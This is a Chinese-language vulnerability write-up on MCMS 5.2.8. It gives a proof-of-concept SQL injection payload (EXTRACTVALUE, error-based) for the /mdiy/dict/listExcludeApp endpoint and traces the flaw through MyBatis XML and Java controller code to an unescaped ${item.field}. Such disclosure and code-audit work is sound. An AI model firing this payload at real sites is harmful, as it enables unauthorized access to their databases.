0x00 前言
铭飞CMS是一款基于java开发的一套轻量级开源内容管理系统。.
漏洞版本:铭飞MCMS5.2.8
0x01 漏洞复现
Poc:
/mdiy/dict/listExcludeApp?dicType=1&orderBy=1&sqlWhere=[{"action"%3a"","field"%3a"1+AND+EXTRACTVALUE(4095,CONCAT(0x7e,(select user()),0x7e))","el":"eq","model":"contentTitle","name":"123","type":"input","value":"a"}]
复现:
0x02 代码审计
全局搜索sqlWhere,在src\main\java\net\mingsoft\cms\dao\IContentDao.xml中有引用外部jar包中sql。
<include refid="net.mingsoft.base.dao.IBaseDao.sqlWhere"></include>
根据所提供位置,找到net.mingsoft.base.dao.IBaseDao.xml。
上面refid就是id,foreach遍历sqlwherelist,item是sqlwherelist中的元素,也可以简单地理解为item就是sqlwherelist。${item.field} 一眼存在注入点,也就是只要引用id为sqlwhere的语句的都存在SQL注入。
<sql id="sqlWhere" databaseId="mysql">
<if test="sqlWhereList != null">
<foreach collection="sqlWhereList" item="item" index="index" open="and( " separator=" " close=" )">
<if test="item.el == 'eq'">
<choose>
<when test="item.multiple != null and item.multiple == true"> FIND_IN_SET(#{item.value}, ${item.field})>0
</when>
<otherwise>
${item.field} = #{item.value}
</otherwise>
</choose>
</if>
<if test="item.el == 'gt'">
<choose>
<when test="item.type=='time'||item.type=='date'">
<if test="item.type=='time'">
date_format(${item.field},'%T') > date_format(#{item.value},'%T') </if>
<if test="item.type=='date'">
date_format(${item.field},'%Y-%m-%d %H:%i:%s') > date_format(#{item.value},'%Y-%m-%d %H:%i:%s')
</if>
</when>
<otherwise>
${item.field} > #{item.value}
</otherwise>
</choose>
</if>
在net\mingsoft\ms-mdiy\2.1.13.1\ms-mdiy-2.1.13.1.jar!\net\mingsoft\mdiy\dao\IDictDao.xml中queryExcludeApp引用了SQL where语句。
<select id="queryExcludeApp" resultMap="resultMap">
select * from mdiy_dict
<where>
省略
<include refid="net.mingsoft.base.dao.IBaseDao.sqlWhere"></include>
追溯dao层IDictDao.java中queryExcludeApp方法使用了该函数,再追溯, net\mingsoft\mdiy\biz\impl\DictBizImpl.java中queryExcludeApp调用了dictDao.queryExcludeApp方法。
@Override
public List queryExcludeApp(DictEntity dictEntity) {
return dictDao.queryExcludeApp(dictEntity);
}
继续追溯,路由 /listExcludeApp 中的listExcludeApp方法调用了dictBiz.queryExcludeApp(dict)。而前端路由还有 /mdiy/dict ,即漏洞url为 /mdiy/dict/listExcludeApp?dicType=
@GetMapping("/listExcludeApp")
@ResponseBody
public ResultData listExcludeApp(@ModelAttribute @ApiIgnore DictEntity dict, HttpServletResponse response, HttpServletRequest request) {
SqlInjectionUtil.*filterContent*(dict.getOrderBy());
dict.setDictEnable(true);
List dictList = dictBiz.queryExcludeApp(dict); //这里
return ResultData.*build*().success(dictList);
}